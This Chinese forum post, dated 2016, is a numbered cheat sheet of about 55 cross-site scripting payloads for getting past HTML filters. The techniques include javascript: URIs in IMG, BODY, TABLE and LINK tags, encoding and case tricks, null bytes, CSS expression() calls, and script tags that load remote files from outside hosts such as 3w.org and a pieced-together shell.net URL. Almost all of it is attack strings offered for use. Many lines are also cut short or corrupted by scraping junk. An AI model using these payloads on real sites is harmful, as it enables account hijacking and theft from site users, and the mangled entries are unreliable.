(1)普通的XSS JavaScript注入
y) ~5 {) {2 j+ P, [# m& L8 Q2 }<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>+ T0 q. f7 Y. P1 O) `8 _( L8 o
(99)另类弹框
% i: P' A: M/ k4 A: v# a, ?' E" A<q/oncut=alert()>12 b% z9 g. M# l7 V$ f% m) k4 P3 d
<s/onclick=alert()>b$ C5 j0 \9 r# k( q* ?) v# g/ m
<XSS=" onclick="alert(1)//">clickme</SSX=">5 V/ ?) ?0 U" r! `6 \
<zzz onclick=alert`1`>clickme</zzz>
$ t1 k8 b/ C4 m) n" \ <a onclick=alert`1`>clickme</a>/ ~0 e/ B! L4 f) A; R# d3 [
<a=">clickme</a=">3 l w# o1 r: w! L* V
<a=">clickme</a>
. T( W, I8 J. K) v! ~$ B1 Q; o! l* K<z=">clickme</z=">
1 r, A n. E3 f3 Y<z onclick=alert`1`>clickme</z>
: @+ |! L- {; s- `! m6 M: Z* A% p* }/ G" [$ [9 r& q
(2)IMG标签XSS使用JavaScript命令+ `& d$ T+ d+ W, m4 `- U9 O
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>& X$ c0 x- l3 T8 r1 L# |% R: }5 c
# Y" k' o7 I+ w/ T) _(3)IMG标签无分号无引号
5 }2 g/ X% W! _$ p<IMG SRC=javascript:alert(‘XSS’)>
# S( |7 t+ [" E4 v! h) D8 G+ m3 j; J/ { V, k0 \* ~
(4)IMG标签大小写不敏感+ n5 G* G% ~3 |' P
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
0 u$ k( |" ^; f% T, h8 I$ o$ v, y, Z; i* F5 v
(5)HTML编码(必须有分号)
$ b- v# U v7 q. d) n$ S) k" f<IMG SRC=javascript:alert(“XSS”)>& Y8 U& }- X+ S4 l9 p
1 \4 ^! j4 D- c(6)修正缺陷IMG标签& `! j: a% C) V
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>0 g) @, M9 |: s: U* R
4 ?2 p9 f0 c( ^) `% i(7)formCharCode标签(计算器)' {# e* c, @0 m: W$ c
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>. ?+ d& m9 D4 r! L6 s5 Y
$ a2 `6 A' k( K2 B3 X! H" @) v
(8)UTF-8的Unicode编码(计算器)+ Y q( m- @5 w" |( @2 S& M) w
<IMG SRC=jav..省略..S')>
* S3 n1 F# v' O& T/ f8 V% {# ~1 `5 u; L+ Q
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)9 f5 x1 ?: B- |/ Q+ c( G# R
<IMG SRC=jav..省略..S')>1 e& d3 D2 H' x# Z% ]
: A' _2 |" I- B0 R% i8 X$ p(10)十六进制编码也是没有分号(计算器)
. h) f1 \* e5 \1 j7 ?<IMG SRC=\'#\'" /span>5 t+ N, T, Z( \& c
8 w$ J3 T2 i7 k0 F5 y: p- T! J(11)嵌入式标签,将Javascript分开
6 V# F: j4 u! ~1 ~& D, g$ @<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>* `! P# w% p4 a8 @
( Q/ k) t. N4 @" p/ y
(12)嵌入式编码标签,将Javascript分开
, p( ~& h; T" Y<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
9 b4 U, u' K3 }$ }1 g( j4 i4 ]7 `% |
(13)嵌入式换行符! P8 G6 U& r. A
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
' h" G! s0 o/ q. D k5 @" |/ x' ~5 h& C
(14)嵌入式回车
9 Z/ y7 h/ e# o1 E/ A<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
w0 s& V2 Z# {" B0 |' n& z) b% f& O6 _* a
(15)嵌入式多行注入JavaScript,这是XSS极端的例子) E' F# i" D4 l3 P% ~% S; G" [- d3 i
<IMG SRC=\'#\'" /span>; c4 }. j# L- z% Z+ O
. x& @( |4 ?( s. B2 w
(16)解决限制字符(要求同页面)
; o8 Y' u6 Z8 Q! C<script>z=’document.’</script>
7 g% O, [: T! t& h" ?, r<script>z=z+’write(“‘</script>! W$ l% M- t" [, m4 e6 a. m
<script>z=z+’<script’</script>
. _0 Z! L9 O3 r<script>z=z+’ src=ht’</script>
" H# ?8 m; M3 Q# Z1 U7 W+ K<script>z=z+’tp://ww’</script>
: O# Y! f& _0 [4 _<script>z=z+’w.shell’</script>
; K; ?! {& L z* [" {& n/ g; e! v<script>z=z+’.net/1.’</script>
& G* p# n2 a5 u, U+ M! S4 B<script>z=z+’js></sc’</script>$ e# ?2 w0 L" a6 `
<script>z=z+’ript>”)’</script>) T( F$ {' H* ^# c( x4 H5 E) b
<script>eval_r(z)</script>+ x* n) V% x! t4 u
% _/ X( N7 y; }# N" Q [
(17)空字符) m3 w0 O, k7 V; g( \* `% G
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
& n1 Y2 A# l1 z% Q/ `9 ~1 n1 N& a4 v& ]& Q h8 `7 I6 C, t
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
: J4 B& l6 v5 {( ] S; Cperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
9 I% j% ^3 A; _/ }# ^/ {: h9 t- r2 ~
(19)Spaces和meta前的IMG标签; N/ m; c% W' l( s! q# C
<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”>* V) T. h' M5 H1 d: B5 Q
+ X3 ?/ R+ x+ x8 x# Q" `$ y(20)Non-alpha-non-digit XSS c: j* [: u' ^. g- I
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>3 q# j2 o0 P0 g0 f5 C
9 O% Q. X9 ^9 p! W% m(21)Non-alpha-non-digit XSS to 2
2 a- z% }! r J" o8 j<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
% w, G4 [& S) U8 w4 \
8 @; W# s1 S d% Q/ V5 u% Y. E(22)Non-alpha-non-digit XSS to 3
8 }! E c2 c: J<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
/ w, E8 o% [; ?: t# h! v0 u& E4 T; K/ q8 ^' R' m" h
(23)双开括号
6 H+ y# Q/ b9 A, p<<SCRIPT>alert(“XSS”);//<</SCRIPT>
5 a& R3 l) t* g# S/ W, ?: [0 J/ `4 o# y, {% `
(24)无结束脚本标记(仅火狐等浏览器)
$ h& k8 t; }9 N1 } p<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
( [" o. g2 M$ T, l9 G r o/ k- C$ L) y9 e3 t; t
(25)无结束脚本标记23 X# a6 P# H* R; X; P: O
<SCRIPT SRC=//3w.org/XSS/xss.js>
( @; m. Z0 v" m; ?1 K
9 a/ T, W/ g* G9 H6 I* `(26)半开的HTML/JavaScript XSS/ ]: |" e9 |- h8 E0 t7 K
<IMG SRC=\'#\'" /span>* p& [' u7 V2 v! v" m
( J7 @0 c# u T2 j% S
(27)双开角括号. G$ y$ N) i! L* |0 I5 X6 K* R: h; {
<iframe src=http://3w.org/XSS.html <
6 E$ \9 D# V% j8 r: n7 P
3 j8 w* j1 l: |2 T/ T# ~: Y, d+ h5 F(28)无单引号 双引号 分号1 e1 ~9 b7 ^/ G& a4 @
<SCRIPT>a=/XSS/" L, k; [' i: H" s/ ~
alert(a.source)</SCRIPT>1 s. w: Z7 E# {8 m2 H5 i
. [1 W8 s3 [. \3 P(29)换码过滤的JavaScript$ l& |/ e. u3 Y' C4 j
\”;alert(‘XSS’);//
1 L* v1 I/ ~3 r3 [5 b) \
: q3 P* u8 S8 q+ ~0 \(30)结束Title标签
; y* H4 W9 l- |! R% @, M2 T</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>/ l: Q7 V7 w* K% x& v: n% ]! r0 A
Y- J( c3 b) I9 L
(31)Input Image
( N5 k9 U% R7 ^ O1 Y# G& U, g<INPUT SRC=\'#\'" /span>$ X! g$ L1 X9 n2 k$ |3 d
$ N2 n6 }* m. i' F8 n. I(32)BODY Image
, U1 r: ]% f$ L<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
' }. [; r) _& q; t3 C" x
9 e/ J8 p r! n1 ?8 Z(33)BODY标签; y7 _, H8 b. Q- e; ^) i F9 U
<BODY(‘XSS’)>3 J& H+ T! n# }/ h" |' [' j
- Q" x1 b/ G9 l
(34)IMG Dynsrc
/ R3 G7 }4 c; M3 W<IMG DYNSRC=\'#\'" /span>
- \2 h+ D0 }( ^: Y% w3 K! E. o9 e2 H. E, \
(35)IMG Lowsrc
$ c# Z, X8 H, Y' q8 T" L6 E! |" s<IMG LOWSRC=\'#\'" /span>
! d9 p# J* `' I8 w( b- X. `4 @
2 Q6 ^) K+ x4 t" f$ t' ~+ S(36)BGSOUND8 r- V1 N2 D! S! m4 y
<BGSOUND SRC=\'#\'" /span>
, F8 \4 {- U9 @; _
- ^7 [' M8 o" H, i(37)STYLE sheet
5 ?; D: `3 i3 }4 k3 W4 f<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>7 ]' f' ?" N- O( k q. T9 ]
7 q% n& s9 B/ d4 g6 ^(38)远程样式表. B8 r: R( n I+ z1 L& P3 v
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>. u: `: m6 X0 u8 G6 v! W( Q
( E7 N* r2 r' L) l2 ?(39)List-style-image(列表式)% s4 [2 c* B+ |8 B- t' N
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS) ^. _+ v! Z! W) u
7 K2 Y9 @, s; C* t(40)IMG VBscript0 ?- J& Z* @# s5 b; p9 C
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS: `: o& n. j: T# ]- _! o( C4 N
9 o1 O: Q; }; s5 u) C {(41)META链接url4 p& X+ h7 Q# z( q% T
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
2 U* o' g6 k1 W" h+ M; u# i
0 d- b: Z2 B, ~/ J `(42)Iframe8 M3 }2 h9 q: M) y* f& U% ^
<IFRAME SRC=\'#\'" /IFRAME>
+ b( n$ h$ [# g K+ s& }$ x1 m! n! P: z( U
(43)Frame
$ [* d$ m" i0 h' g- |/ A<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>' h2 `. n8 P% G* X. d
$ W4 r' B G& `; _+ F(44)Table
# R. R& {) K. W7 Z# N: @! z) j<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>' H1 e/ ? Y F$ R, M1 Q
/ W' D- {6 j0 G% o
(45)TD
: o% @0 B' m' O2 P; E- q<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>4 g2 |& T( b1 q! M
6 ]/ a! z n0 j) Z! i! X5 ^. ~0 E7 n
(46)DIV background-image
5 \. J+ F3 h; J6 j: M<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>( g6 {( K# V8 n
( c& I; o/ i0 w8 x* e
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279); k/ F- H2 Q) j; {
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
& h$ [6 _+ |) O1 x6 y
5 E9 k# ^* J! z5 r6 w( x(48)DIV expression
% q$ s$ _- b1 Y3 B- b l' |<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
- C" h; F4 x- T( o9 d* [) Q* r7 V( b9 w# u
(49)STYLE属性分拆表达& F5 I! s' g( q2 K" s
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>9 D9 u/ L. A) P1 R
; u* W, j+ O$ q
(50)匿名STYLE(组成:开角号和一个字母开头): x% i0 ?7 v. q) J& n
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>; t$ s7 J' N, ^9 a
- f) N# q- d5 A# b7 w% B(51)STYLE background-image3 W K) ]/ P6 O" W+ |$ V! G' r f
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
: i" v: Z% Z/ D0 O- ]/ A. f: O0 M( l" x: C( G, T$ R% \
(52)IMG STYLE方式1 l! d9 V$ s* U, f
exppression(alert(“XSS”))’>) r: a8 t$ m: j5 A. b n
; |& l, t1 ~' ^7 L1 m- a(53)STYLE background
4 f& a3 I% W4 F" N<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
7 R( P# C0 R! A) u; _# g' L& m! m8 L
(54)BASE7 ^1 ~# N n' s' U0 [8 O
<BASE HREF=”javascript:alert(‘XSS’);//”>+ j, I' e& G! ]+ k
- ?" I# [4 E4 {4 h; Y(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
" n2 ^" H; B9 o- M. [3 |, d! d<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>
' V: ^* n% }, ] |
发表于 2016-4-28 10:06:15
收藏
支持
反对